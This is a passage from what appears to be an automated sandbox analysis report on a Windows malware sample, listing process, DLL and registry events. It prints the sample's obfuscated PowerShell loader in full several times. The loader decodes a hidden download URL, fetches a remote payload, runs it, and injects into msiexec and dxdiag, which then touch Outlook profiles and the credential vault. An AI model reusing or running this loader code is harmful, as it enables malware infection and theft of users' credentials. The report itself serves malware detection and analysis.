StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:AntndJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3031770631.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.20.dr
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdb source: 31437F.exe.20.dr

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress", "0")
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR
                Source: Yara matchFile source: 00000004.00000002.3059770247.000000000A8DE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3059410794.0000000008A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Paradeful)$global:Regionplanarbejder = [System.Text.Encoding]::ASCII.GetString($Sydforhngenes)$global:Snigveje=$Regionplanarbejder.substring($Diktatet,$Syntaksgenkendelserne)<#Swordm
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Sluds $Mismeasuring $Demonstrating), (Tablelands46 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:duchesser = [AppDomain]::CurrentDomain.GetAssemblies()$g
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nonvital)), $Luskeriers).DefineDynamicModule($Lampooning, $false).DefineType($Behight, $Bundtedes, [System.MulticastDelegate])$Distrah
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Paradeful)$global:Regionplanarbejder = [System.Text.Encoding]::ASCII.GetString($Sydforhngenes)$global:Snigveje=$Regionplanarbejder.substring($Diktatet,$Syntaksgenkendelserne)<#Swordm
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P 